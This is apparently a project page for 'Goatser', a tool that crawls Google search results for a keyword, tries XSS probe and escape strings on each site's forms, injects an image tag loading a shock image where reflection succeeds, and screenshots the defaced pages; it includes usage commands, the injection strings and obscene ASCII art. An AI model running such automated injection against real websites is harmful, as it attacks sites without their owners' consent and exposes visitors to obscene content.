Blog of :/

index

Eh

GOATSER

This corporate software aims to find XSS trivial issues on websites and exploit them to print the Goatse™ photo, and to automatically take screenshots.

download

Download

DEPENDENCIES

  • python-mechanize
  • python-lxml
thirdparty 'shotfactory':
  • tightvncserver
  • netpbm
  • xautomation
  • scrot


GIT IT

  $ git clone git://git.symlink.me/pub/romain/goatser.git
  

SETUP

There isn't anything to install. Firstly, copy example.conf to goatser.conf and edit it.

You firstly have to run shotfactory:

  $ ./shotfactory.sh
  


USE IT

Then, run goatser:

  $ ./goatser.py KEYWORD [START-PAGE [NB]]
  

Parameters are:

  • KEYWORD: this is the key to search on Google®.
  • START-PAGE: first page to get results on (default=1).
  • NB: number of results to analyze.

For example:

  $ ./goatser.py goatse 3 200
  

It is often better to avoid to start on page 1, because first results are mostly famous websites without so trivial XSS issues.

When a XSS is found, a screenshot is taken by shotfactory and is put in the screenshots directory.

[ main page ] [ architecture ] [ gallery ]

architecture

Architecture

Scheme:

.--------------------------------------------------------------------.
| File  Edit  View  History  Bookmarks  Tools  Help            _ O x |
| <- -> x o                                                          |
| URL: http://linux.com                                              |
|++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
|                                                                    |
| WELCOME ON LINUX.COM LOL                                           |
|             _______________________________   ____                 |
|    Search: |<img src="http://goatse.es/h"/>| | GO |                |
|             ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯   ¯¯¯¯                 |
|        * g o a t s e x * g o a t s e x * g o a t s e x *           |
|        g                                               g           |
|        o /     \             \            /    \       o           |
|        a|       |             \          |      |      a           |
|        t|       `.             |         |       :     t           |
|        s`        |             |        \|       |     s           |
|        e \       | /       /  \\\   --__ \\       :    e           |
|        x  \      \/   _--~~          ~--__| \     |    x           |
|        *   \      \_-~                    ~-_\    |    *           |
|        g    \_     \        _.--------.______\|   |    g           |
|        o      \     \______// _ ___ _ (_(__>  \   |    o           |
|        a       \   .  C ___)  ______ (_(____>  |  /    a           |
|        t       /\ |   C ____)/      \ (_____>  |_/     t           |
|        s      / /\|   C_____)       |  (___>   /  \    s           |
|        e     |   (   _C_____)\______/  // _/ /     \   e           |
|        x     |    \  |__   \\_________// (__/       |  x           |
|        *    | \    \____)   `----   --'             |  *           |
|        g    |  \_          ___\       /_          _/ | g           |
|        o   |              /    |     |  \            | o           |
|        a   |             |    /       \  \           | a           |
|        t   |          / /    |         |  \           |t           |
|        s   |         / /      \__/\___/    |          |s           |
|        e  |         / /        |    |       |         |e           |
|        x  |          |         |    |       |         |x           |
|        * g o a t s e x * g o a t s e x * g o a t e x *             |
|                                                                    |
|                                                                    |
'--------------------------------------------------------------------'
		

A script named goatser.py is run with a keyword to search on Google©, and goes on each result websites. Then, it tries a trivial XSS <b>GOATSE</b> pattern on each forms. After posting a form, if this pattern is found on loaded page, the Goatse™ photo is tried to be included in, then a parser is used to find it in the document. Sometimes, we have to escape the pattern, for example with:

  • "/>
  • ';"/>--></script>
  • </title></head><body>
The bot also walks on links on main page which contain 'search' or 'cherch'.

When we're sure the Goatse™ is included in document, a snapshot request is created as a file in the queue/ directory. Then, the daemon shotfactory launches VNC and the browser, goes on website and takes a screenshot.

[ main page ] [ download ] [ gallery ]

HEADER

Example of results gotten with Goatser.

style

#home {
    font-family: Helvetica, Arial, Sans-Serif, Serif, Times;
    margin: auto;
    text-align: center;
}
p   {
    text-align: left;
}
ul, li {
  list-style-type: none;
  font-size: 1.2em;
}
.warning {
  font-size: 1.5em;
  border-bottom: 1px solid grey;
  padding-bottom: 10px;
}

.note {
 font-size: 2.1em;
 font-style: italic;
}

ul.menu li  {
  display: inline
}
.menu li a:before {
  content: "[ "
}
.menu li a:after {
  content: " ]"
}

.links li:before {
  content: "*"
}
.links li:after {
  content: "*"
}

img, img a {
 border: none;
 }
 img a:hover {

}
.links {
 border-bottom: 1px solid grey;
 padding-bottom: 10px;
}

#imggoatse a {
margin: auto;
 background: url(hello.jpg);
 height: 360px;
 width:445px;
 display: block;
}

#imggoatse a:hover {
margin: auto;
 /*background: url(new.jpg);*/
 height: 360px;
 width:445px;
 display: block;
}